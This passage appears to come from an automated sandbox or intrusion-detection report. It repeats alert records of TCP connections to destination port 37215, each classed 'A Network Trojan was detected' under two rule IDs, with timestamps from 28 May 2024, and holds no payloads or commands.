                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912243
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547665
                  SID:2835222
                  Source Port:45548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2835222
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543829
                  SID:2829579
                  Source Port:33476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765376
                  SID:2829579
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.583313
                  SID:2835222
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649313
                  SID:2829579
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651752
                  SID:2829579
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806128
                  SID:2835222
                  Source Port:56888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536099
                  SID:2829579
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655632
                  SID:2829579
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719824
                  SID:2835222
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536067
                  SID:2835222
                  Source Port:38460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543428
                  SID:2835222
                  Source Port:60118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942534
                  SID:2829579
                  Source Port:49092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294506
                  SID:2829579
                  Source Port:53518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804068
                  SID:2835222
                  Source Port:38872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906931
                  SID:2835222
                  Source Port:49110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594934
                  SID:2835222
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.693812
                  SID:2829579
                  Source Port:43906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536110
                  SID:2835222
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583726
                  SID:2829579
                  Source Port:51864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911966
                  SID:2829579
                  Source Port:51160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490004
                  SID:2829579
                  Source Port:57652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586995
                  SID:2829579
                  Source Port:32850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276816
                  SID:2835222
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695288
                  SID:2829579
                  Source Port:41938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587354
                  SID:2835222
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682875
                  SID:2829579
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781216
                  SID:2829579
                  Source Port:46618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695257
                  SID:2829579
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845174
                  SID:2829579
                  Source Port:52894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604726
                  SID:2835222
                  Source Port:52098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315973
                  SID:2829579
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755576
                  SID:2829579
                  Source Port:38518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.603998
                  SID:2829579
                  Source Port:42262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766490
                  SID:2829579
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555665
                  SID:2829579
                  Source Port:54844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927034
                  SID:2829579
                  Source Port:41240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789818
                  SID:2829579
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.590988
                  SID:2829579
                  Source Port:36150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790270
                  SID:2829579
                  Source Port:36678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651173
                  SID:2835222
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584127
                  SID:2835222
                  Source Port:33590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922720
                  SID:2829579
                  Source Port:48974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586462
                  SID:2835222
                  Source Port:51246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611064
                  SID:2835222
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300121
                  SID:2829579
                  Source Port:53408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846637
                  SID:2835222
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799394
                  SID:2829579
                  Source Port:36502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885473
                  SID:2829579
                  Source Port:36474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536979
                  SID:2829579
                  Source Port:50816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585288
                  SID:2829579
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579014
                  SID:2829579
                  Source Port:41160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719444
                  SID:2829579
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753944
                  SID:2829579
                  Source Port:48598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920009
                  SID:2829579
                  Source Port:60814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799333
                  SID:2835222
                  Source Port:41792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848890
                  SID:2835222
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548288
                  SID:2829579
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545295
                  SID:2835222
                  Source Port:39718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579617
                  SID:2835222
                  Source Port:59556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768683
                  SID:2835222
                  Source Port:53916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.917332
                  SID:2835222
                  Source Port:36840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719073
                  SID:2835222
                  Source Port:59812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628405
                  SID:2829579
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488130
                  SID:2835222
                  Source Port:36394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584437
                  SID:2829579
                  Source Port:38774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315508
                  SID:2835222
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651739
                  SID:2835222
                  Source Port:47826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882550
                  SID:2829579
                  Source Port:34670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651748
                  SID:2835222
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586779
                  SID:2835222
                  Source Port:41470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750222
                  SID:2835222
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.698861
                  SID:2829579
                  Source Port:50426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661717
                  SID:2829579
                  Source Port:50876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793211
                  SID:2835222
                  Source Port:46928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766698
                  SID:2835222
                  Source Port:47212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607295
                  SID:2835222
                  Source Port:32954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555847
                  SID:2835222
                  Source Port:48390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315651
                  SID:2829579
                  Source Port:52148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628545
                  SID:2835222
                  Source Port:48884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.916130
                  SID:2829579
                  Source Port:57948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629173
                  SID:2835222
                  Source Port:55416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887357
                  SID:2829579
                  Source Port:37900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745914
                  SID:2835222
                  Source Port:42060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628522
                  SID:2835222
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659993
                  SID:2835222
                  Source Port:59450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536568
                  SID:2829579
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809998
                  SID:2829579
                  Source Port:42498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.814136
                  SID:2829579
                  Source Port:59870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278852
                  SID:2829579
                  Source Port:42786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703011
                  SID:2835222
                  Source Port:44052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809975
                  SID:2829579
                  Source Port:56028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661753
                  SID:2829579
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.644117
                  SID:2829579
                  Source Port:50980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276579
                  SID:2835222
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546581
                  SID:2829579
                  Source Port:59996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628148
                  SID:2829579
                  Source Port:46816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702578
                  SID:2835222
                  Source Port:42760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595907
                  SID:2829579
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316338
                  SID:2829579
                  Source Port:49396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793579
                  SID:2835222
                  Source Port:37190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661372
                  SID:2829579
                  Source Port:37718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494550
                  SID:2835222
                  Source Port:41370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529986
                  SID:2829579
                  Source Port:42614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577616
                  SID:2829579
                  Source Port:60258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912219
                  SID:2835222
                  Source Port:36872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661764
                  SID:2829579
                  Source Port:34972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294443
                  SID:2835222
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696086
                  SID:2829579
                  Source Port:56796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795007
                  SID:2835222
                  Source Port:45082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488799
                  SID:2829579
                  Source Port:52882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660591
                  SID:2829579
                  Source Port:43108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750221
                  SID:2829579
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719324
                  SID:2829579
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293060
                  SID:2835222
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300924
                  SID:2829579
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536755
                  SID:2835222
                  Source Port:34804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907535
                  SID:2829579
                  Source Port:52060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788885
                  SID:2829579
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874980
                  SID:2835222
                  Source Port:45392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694821
                  SID:2835222
                  Source Port:57634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629276
                  SID:2829579
                  Source Port:50478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908009
                  SID:2829579
                  Source Port:50502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489468
                  SID:2835222
                  Source Port:53158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886861
                  SID:2835222
                  Source Port:35354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910924
                  SID:2829579
                  Source Port:55706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659960
                  SID:2829579
                  Source Port:38906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868967
                  SID:2835222
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904683
                  SID:2829579
                  Source Port:36396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278006
                  SID:2835222
                  Source Port:52908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489420
                  SID:2829579
                  Source Port:43368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276282
                  SID:2829579
                  Source Port:60170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906711
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703045
                  SID:2829579
                  Source Port:35636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718830
                  SID:2829579
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300162
                  SID:2835222
                  Source Port:54564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517522
                  SID:2829579
                  Source Port:39888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489201
                  SID:2835222
                  Source Port:34984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296996
                  SID:2835222
                  Source Port:39058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794633
                  SID:2829579
                  Source Port:32778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529662
                  SID:2829579
                  Source Port:44190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931137
                  SID:2829579
                  Source Port:55512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720320
                  SID:2835222
                  Source Port:45874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907977
                  SID:2835222
                  Source Port:48880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628377
                  SID:2835222
                  Source Port:50128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928412
                  SID:2835222
                  Source Port:60980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.322583
                  SID:2835222
                  Source Port:39928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742334
                  SID:2835222
                  Source Port:48858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.514243
                  SID:2835222
                  Source Port:59666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809977
                  SID:2829579
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293553
                  SID:2829579
                  Source Port:58860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788984
                  SID:2829579
                  Source Port:47406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665547
                  SID:2835222
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796770
                  SID:2835222
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801947
                  SID:2835222
                  Source Port:43758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660008
                  SID:2835222
                  Source Port:58670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578664
                  SID:2835222
                  Source Port:54676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543481
                  SID:2835222
                  Source Port:54626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315516
                  SID:2829579
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277643
                  SID:2829579
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547380
                  SID:2835222
                  Source Port:57032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2835222
                  Source Port:43492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608566
                  SID:2835222
                  Source Port:36954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795443
                  SID:2829579
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879989
                  SID:2829579
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487990
                  SID:2829579
                  Source Port:57810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649564
                  SID:2829579
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767732
                  SID:2829579
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767834
                  SID:2835222
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859309
                  SID:2835222
                  Source Port:54198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661335
                  SID:2829579
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579009
                  SID:2835222
                  Source Port:55710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489930
                  SID:2835222
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769350
                  SID:2835222
                  Source Port:43616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278845
                  SID:2829579
                  Source Port:41734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585438
                  SID:2829579
                  Source Port:55716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.802063
                  SID:2829579
                  Source Port:36356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797125
                  SID:2829579
                  Source Port:47820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942563
                  SID:2829579
                  Source Port:53870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2829579
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911587
